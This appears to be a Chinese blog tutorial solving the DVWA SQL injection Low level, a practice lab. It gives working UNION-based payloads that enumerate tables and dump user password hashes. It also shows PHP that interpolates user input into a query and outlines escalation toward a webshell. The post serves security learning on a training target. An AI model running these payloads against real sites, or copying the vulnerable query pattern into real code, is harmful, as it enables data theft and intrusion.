DVWA--SQL注入(SQL Injection)--Low

原創 JakeLinfly 2020-07-07 16:04

SQL注入常規思路: 

1、尋找注入點,可以通過 web 掃描工具實現 
2、通過注入點,嘗試獲得關於連接數據庫用戶名、數據庫名稱、連接數據庫用戶權限、操作系統信息、數據庫版本等相關信息。 
3、猜解關鍵數據庫表及其重要字段與內容(常見如存放管理員賬戶的表名、字段名等信息)
4、可以通過獲得的用戶信息,尋找後臺登錄。 
5、利用後臺或瞭解的進一步信息,上傳 webshell 或向數據庫寫入一句話木馬,以進一步提權,直到拿到服務器權限。 

手工注入常規思路: 

1.判斷是否存在注入,注入是字符型還是數字型
2.猜解 SQL 查詢語句中的字段數
3.確定顯示的字段順序 
4.獲取當前數據庫 
5.獲取數據庫中的表 
6.獲取表中的字段名 
7.查詢到賬戶的數據

目錄

級別 :Low

1)輸入1,觀察返回值

2)輸入',報錯,猜測是字符注入

3)猜測字段數(order by),得到查詢結果字段數爲2

4)確定查詢結果顯示位置(SQL語句查詢之後的回顯位置)

5)獲取當前數據庫及版本信息

6)獲取數據庫中的表(information_schema.tables)

7)獲取表字段

8)獲取用戶密碼等信息(可用group_concat)

9)密文解碼

後臺源碼

 

級別 :Low

1)輸入1,觀察返回值

2)輸入',報錯,猜測是字符注入

3)猜測字段數(order by),得到查詢結果字段數爲2

1' order by 1 #     查詢成功
1' order by 2 #     查詢成功
1' order by 4 #     查詢失敗
1' order by 3 #     查詢失敗

4)確定查詢結果顯示位置(SQL語句查詢之後的回顯位置)

1' union select 1,2 #

5)獲取當前數據庫及版本信息

1' union select version(),database() #

6)獲取數據庫中的表(information_schema.tables)

1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

7)獲取表字段

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

8)獲取用戶密碼等信息(可用group_concat)

1' and 1=2 union select user_id,password from users #

9)密文解碼

CMD5解碼

後臺源碼

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

DVWA--SQL注入(SQL Injection)--Medium

DVWA--SQL注入(SQL Injection)--Low 目錄 級別:Medium  1、查看POST請求 2、hackbar提交POST請求 3、輸入',報錯,判斷爲數字型注入 4、猜測SQL查詢的字段數 5、確定回顯的位置 6、

JakeLinfly 2020-07-07 16:04:00

DVWA--SQL注入(SQL Injection)--HIgh

DVWA--SQL注入(SQL Injection)--Low DVWA--SQL注入(SQL Injection)--Medium   級別:High 實際和Low級別一樣,進行SQL注入,參考Low 後臺源碼   <?php i

JakeLinfly 2020-07-07 16:04:00

網絡安全入門之跨站腳本攻擊 DVWA XSS DOM Low to High

文章目錄1. 背景2. 環境搭建3. 跨站腳本攻擊3.1. Low3.2. Medium3.3. High3.3. Impossible 1. 背景 最近需要補充一下網絡安全方面的知識,於是就從基礎的靶場 DVWA (Damn V

Curren.wong 2020-07-06 12:29:10

網絡安全入門之 Burp Suite 暴力破解 DVWA Brute Force Low

文章目錄1. 背景2. 準備工作2.1. 靶場環境2.2. 安裝破解工具3. 破解過程3.1. 代理請求3.2. 攔截請求3.3. 填裝彈藥3.4. 設置崗哨3.5. 開始攻擊4. 參考文獻 1. 背景 最近參加了2020騰訊安全

Curren.wong 2020-07-03 20:45:29

DVWA練習

前言 一個小型靶場。 Brute Force DVWA Security:low 這題的名字是爆破,那我們就爆破一下試試 先隨便提交一個密碼和用戶名,打開代理,bp抓包 然後,發送到Intruder模塊,進行如下設置 然後載入

n0vic3 2020-07-01 14:09:12

DVWA-1.9系列操作之Command Injection

DVWA-1.9系列一共分爲10個功能模塊: Brute Force(暴力破解) Command Injection(命令行注入) CSRF(跨站請求僞造) File Inclusion(文件包含) File Upload(文件

fly小灰灰 2020-06-28 23:36:05

一步一步學習DVWA--蠻力破解(第一期)

小夥伴們,我們一起學習一下DVWA這個如何進行安全攻擊吧。 學習下DVWA(Damn Vulnerable Web Application),那麼這玩意是個啥呢?DVWA是一款滲透測試的練習系統,也就是我們的測試靶機,很適合入門,要爲以後

manok 2020-06-27 17:25:34

DVWA——CSRF 跨站請求僞造

CSRF屬於業務邏輯漏洞X SQL注入、XSS屬於技術漏洞 原理 利用受害者尚未失效的身份認證信息(cookie,會話等),誘導受害人點擊惡意鏈接或者含有攻擊代碼的頁面,在受害人不知情的情況下,以受害者身份向服務器發送請求,

per_se_veran_ce 2020-06-25 23:31:49

DVWA(二)——命令執行

首先,先來了解一下重要的幾個符號。。。 && :command1&&command2 按順序執行,錯誤截止 &:command1&command2 可單獨執行 ||:command1||command2 只執行1,1錯執行2

per_se_veran_ce 2020-06-25 23:31:49

5、DVWA、Vulnerability: Insecure CAPTCHA

5、Vulnerability: Insecure CAPTCHA 以上代碼的作用爲判斷新的代碼和驗證的代碼是否相同,相同則更改成功,否則報錯。 具體函數可參考暴力破解: 主要用處之一有:mysqli_real_escape_st

qq_44598397 2020-06-20 06:12:37

DVWA靶場-SQL Injection (Blind) SQL盲注

往期博文: DVWA靶場-Brute Force Source 暴力破解 DVWA靶場-Command Injection 命令注入 DVWA靶場-CSRF 跨站請求僞造 DVWA靶場-File Inclusion 文件包含 DVWA靶場

buglige 2020-06-15 23:26:47

DVWA靶場-Brute Force Source 暴力破解

  靶場環境搭建 https://github.com/ethicalhack3r/DVWA [網絡安全學習篇附]:DVWA 靶場搭建 目錄   Brute Force Source 暴力破解 Low Brute Force 核心代碼

buglige 2020-06-15 23:26:47

DVWA靶場-Weak Session IDs 脆弱的Session

往期博文: DVWA靶場-Brute Force Source 暴力破解 DVWA靶場-Command Injection 命令注入 DVWA靶場-CSRF 跨站請求僞造 DVWA靶場-File Inclusion 文件包含 DVWA靶場

buglige 2020-06-15 23:26:47

DVWA靶場-File Inclusion 文件包含

往期博文: DVWA靶場-Brute Force Source 暴力破解 DVWA靶場-Command Injection 命令注入 DVWA靶場-CSRF 跨站請求僞造 靶場環境搭建 https://github.com/ethica

buglige 2020-06-15 23:26:47

DVWA靶場-XSS(DOM型、反射型、存儲型)

往期博文: DVWA靶場-Brute Force Source 暴力破解 DVWA靶場-Command Injection 命令注入 DVWA靶場-CSRF 跨站請求僞造 DVWA靶場-File Inclusion 文件包含 DVWA靶場

buglige 2020-06-15 23:26:47